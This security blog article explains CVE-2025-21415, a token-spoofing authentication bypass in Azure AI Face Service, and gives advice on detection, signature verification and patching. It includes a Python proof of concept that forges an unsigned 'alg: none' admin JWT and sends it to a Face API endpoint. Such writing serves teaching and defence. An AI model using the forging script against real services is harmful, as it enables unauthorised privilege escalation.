A newly disclosed vulnerability, CVE-2025-21415, has shaken up cloud security conversations. This flaw impacts Azure AI Face Service, a critical component for many organizations using Microsoft’s cloud AI suite. Through an authentication bypass by spoofing, an attacker who already holds basic privileges can elevate them over the network. In this article, we’ll unpack how the attack works, point to reference sources, and cover practical mitigation steps. We’ll also walk through a code snippet that illustrates the kind of token-validation flaw involved.

What is Azure AI Face Service?

Azure Face Service is an AI-driven API from Microsoft that analyzes human faces in images. It’s widely used in identity verification solutions, attendance systems, and other security-conscious applications.



Overview: What Is CVE-2025-21415?

CVE-2025-21415 is an authentication bypass vulnerability, specifically a spoofing issue. Here’s what that means in simple terms:

- Authentication bypass: Allows someone to sneak past a legitimate login check.

- Spoofing: The attacker pretends to be someone they’re not (impersonation, forging identities, falsifying data, etc.).

So, if a company uses Azure Face for access to critical assets or apps, this exploit lets attackers jump over those controls entirely – all they need is network access and basic prior privileges.

How Does the Exploit Work?

1. Flawed Identity Validation: The core issue is Azure Face Service’s improper validation of authentication tokens.

2. Spoofing: Attackers can create forged tokens that look valid to the API but represent any user they choose – even administrators.

3. Privilege Escalation: The service trusts the forged identity, letting the attacker issue high-privileged commands.
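To make the three steps above concrete, here is a minimal sketch of the kind of flawed check they describe. It is not Azure's actual code, whose internals are not public. The function name `naive_validate` and the helper names are hypothetical, and the `user` and `role` claims simply mirror the example payload used in this article's demonstration.

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    # base64url encoding strips "=" padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def naive_validate(token: str) -> dict:
    """Hypothetical flawed check: parses the token but never verifies the signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, _signature = parts
    json.loads(b64url_decode(header_b64))  # structure check only
    # The claims are returned and trusted without any cryptographic proof.
    return json.loads(b64url_decode(payload_b64))


# Steps 1 and 2: forge a well-formed token with an empty signature segment.
forged = ".".join([
    b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode()),
    b64url_encode(json.dumps({"user": "admin", "role": "Admin"}).encode()),
    "",
])

# Step 3: the flawed validator hands back the attacker-chosen role.
claims = naive_validate(forged)
print(claims["role"])
```

Because nothing ties the payload to a key the attacker lacks, any identity written into the token is accepted as-is.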

Step-by-Step Example (Exploit Demonstration)

Let’s walk through a simplified version of how this can happen. Below is a Python code snippet using the requests and PyJWT libraries.

Note: It's unethical and illegal to run real attacks against live systems you do not own. This example is for educational purposes only.

import requests
import jwt  # PyJWT library (pip install pyjwt)

# Attacker crafts a JWT (JSON Web Token) spoofing an admin user.
# Real systems sign tokens with a secret/private key, but if the service only
# checks token structure, not signature, a fake token can bypass authentication.
def create_spoofed_token(username='admin'):
    header = {'alg': 'none'}  # Exploit vulnerable header parsing
    payload = {'user': username, 'role': 'Admin'}
    # algorithm='none' tells PyJWT to emit an unsigned token (empty signature)
    token = jwt.encode(payload, key=None, algorithm='none', headers=header)
    return token

spoofed_token = create_spoofed_token()

# Send spoofed token to the Azure Face API endpoint
headers = {
    'Authorization': f'Bearer {spoofed_token}'
}
endpoint = 'https://YOUR-FACE-API-ENDPOINT/face/v1.0/users/me'  # Example endpoint
response = requests.get(endpoint, headers=headers)
print('Status code:', response.status_code)
print('Response:', response.text)

- The attacker uses the alg: none JWT trick (well-known in token validation research).

- If the service *only* checks token structure and not signature (*as with older or misconfigured JWT libraries*), it accepts the attacker’s token.
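One quick way to spot this class of token, for example when reviewing logged Authorization headers, is to decode the header segment and look at the signature segment. The sketch below uses only the standard library. `is_unsigned_token` is a hypothetical helper name, and the sample token is hand-built for illustration.

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    # base64url encoding strips "=" padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def is_unsigned_token(token: str) -> bool:
    """Return True if the token declares alg "none" or carries no signature."""
    parts = token.split(".")
    if len(parts) != 3:
        return False  # not a compact three-segment token at all
    header = json.loads(b64url_decode(parts[0]))
    alg = str(header.get("alg", "")).lower()
    return alg == "none" or parts[2] == ""


# Sample token: header {"alg":"none"}, payload {"user":"admin","role":"Admin"},
# and an empty third segment where the signature would normally be.
sample = "eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiQWRtaW4ifQ."
print(is_unsigned_token(sample))
```

A check like this is a triage aid for finding suspicious tokens, not a substitute for verifying signatures on the server.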

References for JWT 'alg: none' attacks

- JWT security issues

- CVE-2015-9235 (previous JWT bypasses)

Microsoft Security Advisory

The official Microsoft advisory for CVE-2025-21415 urges customers to:

- Patch the service via the Azure portal or CLI.

- Check your API authentication flow: Use robust JWT validation libraries that check both token validity and signature.
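To show what checking both validity and signature involves, here is a standard-library sketch of an HS256 verifier. It is an illustration under assumptions, not the service's real scheme: the HS256 choice, the demo key, and the names `sign_hs256` and `verify_hs256` are all hypothetical. In production, a maintained JWT library with the accepted algorithms pinned explicitly is the safer route.

```python
import base64
import hashlib
import hmac
import json
import time


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a compact HS256 token (demo helper for the check below)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url_encode(json.dumps(claims).encode())
    mac = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(mac)}"


def verify_hs256(token: str, key: bytes) -> dict:
    """Return the claims only if algorithm, signature, and expiry all check out."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
    except ValueError as exc:
        raise ValueError("malformed token") from exc
    # Pin the algorithm on the server side; never let the token choose it.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise ValueError("unexpected algorithm")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    # Constant-time comparison avoids leaking how many bytes matched.
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(payload_b64))
    if claims.get("exp", 0) <= time.time():
        raise ValueError("token expired or missing exp")
    return claims


key = b"demo-only-secret-key-32-bytes-long!!"  # hypothetical key for the demo
good = sign_hs256({"user": "alice", "role": "User", "exp": int(time.time()) + 300}, key)
print(verify_hs256(good, key)["user"])

# An unsigned token that reuses the genuine payload is refused.
forged = b64url_encode(b'{"alg":"none"}') + "." + good.split(".")[1] + "."
try:
    verify_hs256(forged, key)
except ValueError as err:
    print("rejected:", err)
```

The important design choice is that the verifier decides which algorithm is acceptable before it looks at any claims, so a token cannot downgrade itself to unsigned.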

Conclusion

CVE-2025-21415 is a classic authentication bypass problem with a modern cloud flavor. Spoofing authentication tokens is a *deadly simple attack* when defenses are down or misconfigured.

If you’re running Azure Face Service, patch as soon as possible, validate your identity checks, and never trust user input – even (especially!) authentication tokens.

Useful Links & References

- Microsoft CVE-2025-21415 Security Update Guide

- Azure Face Service Documentation

- JWT Security: Critical Vulnerabilities

- CWE-290: Authentication Bypass by Spoofing

*Stay safe, and update your cloud security playbook regularly!*

Timeline

Published on: 01/29/2025 23:15:33 UTC

Last modified on: 02/12/2025 18:28:51 UTC